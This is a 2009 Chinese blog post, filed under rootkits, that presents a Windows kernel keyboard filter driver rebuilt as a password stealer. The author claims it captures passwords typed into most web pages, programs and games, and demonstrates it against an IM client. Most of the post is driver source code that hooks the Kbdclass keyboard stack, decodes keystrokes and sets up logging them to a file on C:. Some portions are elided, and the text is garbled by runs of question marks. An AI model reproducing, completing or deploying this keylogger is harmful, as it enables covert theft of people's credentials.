
            S.l.e!ep.¢%

            像打了激速一樣,以四倍的速度運轉,開心的工作
            簡單、開放、平等的公司文化;尊重個性、自由與個人價值;

            Get IM's Pwd use SYS

            Posted on 2009-12-15 20:40 S.l.e!ep.¢% 閱讀(339) 評論(0)  編輯 收藏 引用 所屬分類: RootKit


            ???????????????????? 今天下午沒有事做,把暑假回家寫的鍵盤過濾驅動改進成,密碼盜竊驅動。
            ???????????????????????????????????????????? 可以盜竊目前98%的網頁,程序,游戲的密碼。
            ?????????????????? 今天我來演示盜竊某著名IM軟件密碼,把密碼保存在C盤下zhuruinan.txt文本文件里
            ???????????????????????????????????? 通過加載zhusjm.sys過濾驅動,我們可以得到輸入的密碼。
            ???????????????????????????????????????????????? 通過DebugView查看我們的驅動輸出信息

            ????????


            -----------------------------------------------------------------------------------------------------------------------------------

            ?????????????????????????? 過濾驅動核心代碼?? (里面。。。。部分為省略部分,可以問本人)

            #include <ntddk.h>
            #include <ntddkbd.h>#define KBD_DRIVER_NAME?? L"\\Driver\\Kbdclass" //把我們的設備綁定到這個驅動之上
            UNICODE_STRING?? uni_DosName;
            ANSI_STRING?????? ansi_FileName;
            LARGE_INTEGER???? numm;
            HANDLE hfile;
            IO_STATUS_BLOCK zhuruinan;
            OBJECT_ATTRIBUTES sjm;
            UNICODE_STRING make;
            LONG we=1;typedef struct zhuruinan
            {
            ???? // 這個結構的大小
            ???? ULONG NodeSize;
            ???? // 過濾設備對象
            ???? PDEVICE_OBJECT pFilterDeviceObject;
            ???? // 同時調用時的保護鎖
            ???? KSPIN_LOCK IoRequestsSpinLock;???? KEVENT IoInProgressEvent;
            ???? // 綁定的設備對象
            ???? PDEVICE_OBJECT TargetDeviceObject;
            ???? // 綁定前底層設備對象
            ???? PDEVICE_OBJECT LowerDeviceObject;
            } KEY_ZHU_SJM, *PKEY_ZHU_SJM;NTSTATUS?? writyu( IN PKEY_ZHU_SJM devExt,IN PDEVICE_OBJECT pFilterDeviceObject, IN PDEVICE_OBJECT pTargetDeviceObject,IN PDEVICE_OBJECT pLowerDeviceObject )
            ?? {
            ???? memset(devExt, 0, sizeof(KEY_ZHU_SJM));
            ???? devExt->NodeSize = sizeof(KEY_ZHU_SJM);
            ???? devExt->pFilterDeviceObject = pFilterDeviceObject;
            ???? KeInitializeSpinLock(&(devExt->IoRequestsSpinLock));
            ???? KeInitializeEvent(&(devExt->IoInProgressEvent), NotificationEvent, FALSE);
            ???? devExt->TargetDeviceObject = pTargetDeviceObject;
            ???? devExt->LowerDeviceObject = pLowerDeviceObject;
            ???? return( STATUS_SUCCESS );
            ?? }NTSTATUS?? ObReferenceObjectByName(?????????? //通過這個未公開函數獲取系統鍵盤設備驅動Kbdclass的指針
            ???????????????????????? PUNICODE_STRING ObjectName,
            ???????????????????????? ULONG Attributes,
            ???????????????????????? PACCESS_STATE AccessState,
            ???????????????????????? ACCESS_MASK DesiredAccess,
            ???????????????????????? POBJECT_TYPE ObjectType,
            ???????????????????????? KPROCESSOR_MODE AccessMode,
            ???????????????????????? PVOID ParseContext,
            ???????????????????????? PVOID *Object
            ???????????????????????? );extern POBJECT_TYPE IoDriverObjectType;
            ULONG keynumber = 0;#define?? DELAY_ONE_MICROSECOND?? (-10)
            #define?? DELAY_ONE_MILLISECOND (DELAY_ONE_MICROSECOND*1000)
            #define?? DELAY_ONE_SECOND (DELAY_ONE_MILLISECOND*1000)
            VOID?? Delmekey(IN PDEVICE_OBJECT pDeviceObject)
            {
            PKEY_ZHU_SJM devExt;
            BOOLEAN NoRequestsOutstanding = FALSE;
            devExt = (PKEY_ZHU_SJM)pDeviceObject->DeviceExtension;
            __try
            {
            ?? __try
            ?? {
            ?? IoDetachDevice(devExt->TargetDeviceObject);
            ?? devExt->TargetDeviceObject = NULL;
            ?? IoDeleteDevice(pDeviceObject);
            ?? devExt->pFilterDeviceObject = NULL;
            ?? }
            ?? __except (EXCEPTION_EXECUTE_HANDLER){}
            }
            __finally{}
            return;
            }VOID zhukep()
            {
            ???????? ZwOpenFile(&hfile,
            ?????????????????? GENERIC_ALL,
            ?????????????????? &sjm,
            ?????????????????? &zhuruinan,
            ?????????????????? FILE_SHARE_READ|FILE_SHARE_WRITE,
            ?????????????????? FILE_SYNCHRONOUS_IO_NONALERT);
            ???????? ZwWriteFile(hfile,
            ?????? NULL,
            ?????? NULL,
            ?????? NULL,
            ?????? &zhuruinan,
            ????? 。。。。。。。。。。。。。。

            ????? 。。。。。。。。。。。。。。
            ?????? NULL);?
            ???????? ZwClose(hfile);
            ?????? 。。。。。。。。。。。。。
            ?????? return;}

            VOID?? Unload(IN PDRIVER_OBJECT DriverObject)
            {
            ???? PDEVICE_OBJECT DeviceObject;
            ???? PDEVICE_OBJECT OldDeviceObject;
            ???? PKEY_ZHU_SJM devExt;???? LARGE_INTEGER lDelay;
            ???? PRKTHREAD CurrentThread;
            ???? lDelay = RtlConvertLongToLargeInteger(100 * DELAY_ONE_MILLISECOND);
            ???? CurrentThread = KeGetCurrentThread();
            ???? // 把當前線程設置為低實時模式。
            ???? KeSetPriorityThread(CurrentThread, LOW_REALTIME_PRIORITY);???? UNREFERENCED_PARAMETER(DriverObject);
            ???? // 遍歷所有設備并一律解除綁定
            ???? DeviceObject = DriverObject->DeviceObject;
            ???? while (DeviceObject)
            ???? {
            ???????? // 解除綁定并刪除所有的設備
            ???????? Delmekey(DeviceObject);
            ???????? DeviceObject = DeviceObject->NextDevice;
            ???? }
            ???? ASSERT(NULL == DriverObject->DeviceObject);???? while (keynumber)
            ???? {
            ???????? KeDelayExecutionThread(KernelMode, FALSE, &lDelay);
            ???? }???? KdPrint(("Key is Unload.\n"));
            ???? return;
            }
            NTSTATUS
            adddriver( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
            {
            ???? NTSTATUS status = 0;
            ???? UNICODE_STRING uniNtNameString;
            ???? PKEY_ZHU_SJM devExt;
            ???? PDEVICE_OBJECT pFilterDeviceObject = NULL;
            ???? PDEVICE_OBJECT pTargetDeviceObject = NULL;
            ???? PDEVICE_OBJECT pLowerDeviceObject = NULL;???? PDRIVER_OBJECT KbdDriverObject = NULL;
            ???? // 初始化一個字符串,就是Kdbclass驅動的名字。
            ???? RtlInitUnicodeString(&uniNtNameString, KBD_DRIVER_NAME);
            ???? // 請參照前面打開設備對象的例子。只是這里打開的是驅動對象。
            ???? status = ObReferenceObjectByName (
            ???????? &uniNtNameString,
            ???????? OBJ_CASE_INSENSITIVE,
            ???????? NULL,
            ???????? 0,
            ???????? IoDriverObjectType,
            ???????? KernelMode,
            ???????? NULL,
            ???????? &KbdDriverObject
            ???????? );
            ???? // 如果失敗了就直接返回
            ???? if(!NT_SUCCESS(status))
            ???? {
            ???????? return( status );
            ???? }
            ???? else
            ???? {
            ???????? // 這個打開需要解應用。早點解除了免得之后忘記。
            ???????? ObDereferenceObject(DriverObject);
            ???? }???? // 這是設備鏈中的第一個設備
            ???? pTargetDeviceObject = KbdDriverObject->DeviceObject;
            ???? // 現在開始遍歷這個設備鏈
            ???? while (pTargetDeviceObject)
            ???? {
            ???????? // 生成一個過濾設備,這是前面讀者學習過的。這里的IN宏和OUT宏都是
            ???????? // 空宏,只有標志性意義,表明這個參數是一個輸入或者輸出參數。
            ???????? status = IoCreateDevice(
            ???????????? IN DriverObject,
            ???????????? IN sizeof(KEY_ZHU_SJM),
            ???????????? IN NULL,
            ???????????? IN pTargetDeviceObject->DeviceType,
            ???????????? IN pTargetDeviceObject->Characteristics,
            ???????????? IN FALSE,
            ???????????? OUT &pFilterDeviceObject
            ???????????? );???????? // 如果失敗了就直接退出。
            ???????? if (!NT_SUCCESS(status))
            ???????? {
            ???????????? return (status);
            ???????? }???????? // 綁定。pLowerDeviceObject是綁定之后得到的下一個設備。也就是
            ???????? // 前面常常說的所謂真實設備。
            ???????? pLowerDeviceObject =IoAttachDeviceToDeviceStack(pFilterDeviceObject, pTargetDeviceObject);
            ???????? // 如果綁定失敗了,放棄之前的操作,退出。
            ???????? if(!pLowerDeviceObject)
            ???????? {
            ???????????? IoDeleteDevice(pFilterDeviceObject);
            ???????????? pFilterDeviceObject = NULL;
            ???????????? return( status );
            ???????? }???????? // 設備擴展!下面要詳細講述設備擴展的應用。
            ???????? devExt = (PKEY_ZHU_SJM)(pFilterDeviceObject->DeviceExtension);
            ???????? writyu(devExt, pFilterDeviceObject, pTargetDeviceObject,pLowerDeviceObject );
            ???????? // 下面的操作和前面過濾串口的操作基本一致。這里不再解釋了。
            ???????? pFilterDeviceObject->DeviceType=pLowerDeviceObject->DeviceType;
            ???????? pFilterDeviceObject->Characteristics=pLowerDeviceObject->Characteristics;
            ???????? pFilterDeviceObject->StackSize=pLowerDeviceObject->StackSize+1;
            ???????? pFilterDeviceObject->Flags |= pLowerDeviceObject->Flags & (DO_BUFFERED_IO | DO_DIRECT_IO | DO_POWER_PAGABLE) ;???????? pTargetDeviceObject = pTargetDeviceObject->NextDevice;
            ???? }
            ???? return status;
            }?
            NTSTATUS sjmmake( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
            {
            ???? // 其他IRP請求,用IoCallDriver把IRP發送到真實設備
            ???? IoSkipCurrentIrpStackLocation(Irp);
            ???? return IoCallDriver(((PKEY_ZHU_SJM)DeviceObject->DeviceExtension)->LowerDeviceObject, Irp);
            }
            NTSTATUS zhumake( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
            {
            ???? PKEY_ZHU_SJM devExt;
            ???? devExt =(PKEY_ZHU_SJM)DeviceObject->DeviceExtension;
            ???? PoStartNextPowerIrp( Irp );
            ???? IoSkipCurrentIrpStackLocation( Irp );
            ???? return PoCallDriver(devExt->LowerDeviceObject, Irp );
            }
            NTSTATUS getkey( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context)
            {
            ???? PIO_STACK_LOCATION IrpSp;
            ???? ULONG buf_len = 0;
            ???? PUCHAR buf = NULL;
            ???? size_t i,numKeys;
            ???? PKEYBOARD_INPUT_DATA KeyData;
            ?????
            ????
            ???? IrpSp = IoGetCurrentIrpStackLocation( Irp );???? if( NT_SUCCESS( Irp->IoStatus.Status ) )
            ???? {
            ???????? // 獲得讀請求完成后輸出的緩沖區
            ???????? buf = Irp->AssociatedIrp.SystemBuffer;
            ???????? KeyData = (PKEYBOARD_INPUT_DATA)buf;
            ???????? // 獲得這個緩沖區的長度。
            ???????? buf_len = Irp->IoStatus.Information;
            ???????? numKeys = buf_len / sizeof(KEYBOARD_INPUT_DATA);
            ???????? for(i=0;i<numKeys;++i)
            ?????????? {
            ???????????????????? if(KeyData->Flags)
            ?????????????????????? {
            ???????????????????????? if( KeyData->MakeCode==2)
            ?? {
            ???? DbgPrint("1");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"1");
            ????????????
            ?? }
            ???????????????????????? if( KeyData->MakeCode==3)
            ?? {
            ???? DbgPrint("2");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"2");

            ?? }
            ???????????????????????? if( KeyData->MakeCode==4)
            ?? {
            ???? DbgPrint("3");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"3");
            ???????
            ?? }
            ???????????????????????? if( KeyData->MakeCode==5)
            ?? {
            ???? DbgPrint("4");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"4");?? }?
            ???????????????????????? if( KeyData->MakeCode==6)
            ?? {
            ???? DbgPrint("5");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"5");?? }
            ???????????????????????? if( KeyData->MakeCode==7)
            ?? {
            ???? DbgPrint("6");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"6");
            ???
            ?? }
            ???????????????????????? if( KeyData->MakeCode==8)
            ?? {
            ???? DbgPrint("7");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"7");?? }
            ???????????????????????? if( KeyData->MakeCode==9)
            ?? {
            ???? DbgPrint("8");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"8");?? }
            ???????????????????????? if( KeyData->MakeCode==10)
            ?? {
            ???? DbgPrint("9");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"9");?? }
            ???????????????????????? if( KeyData->MakeCode==11)
            ?? {
            ???? DbgPrint("0");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"0");?? }
            ???????????????????????? if( KeyData->MakeCode==12)
            ?? {
            ???? DbgPrint("-");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"-");
            ????
            ?? }???????????????????????? if( KeyData->MakeCode==13)
            ?? {
            ???? DbgPrint("+");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"+");
            ??
            ?? }???????????????????????? if( KeyData->MakeCode==14)
            ?? {
            ???? DbgPrint("<-");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"<-");?? }
            ???????????????????????? if( KeyData->MakeCode==15)
            ?? {
            ???? DbgPrint("Tab");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"Tab");
            ?? }
            ???????????????????????? if( KeyData->MakeCode==16)
            ?? {
            ???? DbgPrint("Q");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"Q");
            ??????????????????????????????
            ?? }
            ???????????????????????? if( KeyData->MakeCode==17)
            ?? {
            ???? DbgPrint("W");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"W");
            ??????
            ???????????????? }
            ?????????????????????? if( KeyData->MakeCode==18)
            ?? {
            ???? DbgPrint("E");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"E");
            ????????????????
            ?? }
            ???????????????????????? if( KeyData->MakeCode==19)
            ?? {
            ???? DbgPrint("R");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"R");
            ???????????
            ?? }
            ???????????????????????? if( KeyData->MakeCode==20)
            ?? {
            ???? DbgPrint("T");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"T");
            ???????????????????????
            ?? }
            ?????????????????????? if( KeyData->MakeCode==21)
            ?? {
            ???? DbgPrint("Y");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"Y");
            ????????????????????
            ?? }
            ?????????????????????? if( KeyData->MakeCode==22)
            ?? {
            ???? DbgPrint("U");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"U");
            ??????????????
            ?? }
            ?????????????????????? if( KeyData->MakeCode==23)
            ?? {
            ???? DbgPrint("I");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"I");
            ???????????????????????????
            ?? }
            ?????????????????????? if( KeyData->MakeCode==24)
            ?? {
            ???? DbgPrint("O");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"O");
            ??????????????????
            ?? 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

            。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。????????????????????
            ?
            ?????????????????? if( KeyData->MakeCode==83)
            ?? {
            ???? DbgPrint(".");
            ???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L".");
            ?? }?
            ?????????????????? we=1;
            ?????????????????? RtlUnicodeStringToAnsiString(&ansi_FileName,&uni_DosName,TRUE);
            ?????????????????
            ??????????????
            ?????????????? }?????????? }
            ???? }???? keynumber--;
            if( Irp->PendingReturned )
            {
            ?? IoMarkIrpPending( Irp );
            }
            ???? return Irp->IoStatus.Status;
            }
            NTSTATUS keylook( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
            {
            ???? NTSTATUS status = STATUS_SUCCESS;
            ???? PKEY_ZHU_SJM devExt;
            ???? PIO_STACK_LOCATION currentIrpStack;
            ???? KEVENT waitEvent;
            ???? KeInitializeEvent( &waitEvent, NotificationEvent, FALSE ); if (Irp->CurrentLocation == 1)
            {
            ?? ULONG ReturnedInformation = 0;
            ?? status = STATUS_INVALID_DEVICE_REQUEST;
            ?? Irp->IoStatus.Status = status;
            ?? Irp->IoStatus.Information = ReturnedInformation;
            ?? IoCompleteRequest(Irp, IO_NO_INCREMENT);
            ?? return(status);
            }???? // 全局變量鍵計數器加1
            ???? keynumber++;
            ???? // 得到設備擴展。目的是之后為了獲得下一個設備的指針。
            ???? devExt =(PKEY_ZHU_SJM)DeviceObject->DeviceExtension;
            ???? // 設置回調函數并把IRP傳遞下去。 之后讀的處理也就結束了。
            ???? currentIrpStack = IoGetCurrentIrpStackLocation(Irp);
            ???? IoCopyCurrentIrpStackLocationToNext(Irp);
            ???? IoSetCompletionRoutine( Irp,getkey,DeviceObject, TRUE, TRUE, TRUE );
            ?????? 。。。。。。?????? 。。。。。。
            ???? return?? IoCallDriver( devExt->LowerDeviceObject, Irp );?
            }

            NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
            {
            ???? ULONG i;
            ???? NTSTATUS status;???? // 填寫所有的分發函數的指針
            ???? for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
            ???? {
            ???????? DriverObject->MajorFunction = sjmmake;
            ???? }
            ???? //寫一個IRP_MJ_POWER函數。這是因為這類請求中間要調用
            ???? DriverObject->MajorFunction [IRP_MJ_POWER] = zhumake;
            ???
            ???? //寫一個Read分發函數,因為要的過濾就是讀取來的按鍵信息
            ???? DriverObject->MajorFunction[IRP_MJ_READ] =keylook;???? // 卸載函數。
            ???? DriverObject->DriverUnload =Unload;
            ???? // 綁定所有鍵盤設備
            ???? status =adddriver(DriverObject, RegistryPath);
            ???? numm.QuadPart=1;???? RtlInitUnicodeString(&make,L"\\??\\C:\\zhuruinan.TXT");
            ???? InitializeObjectAttributes(&sjm,&make,OBJ_CASE_INSENSITIVE,NULL,NULL);???? 。。。。。。。。。。。。。
            ???? 。。。。。。。。。。。。。???????
            ???? return status;
            }


            http://hi.baidu.com/zhutas/blog/item/a7db561c83daa98187d6b691.html

            ?
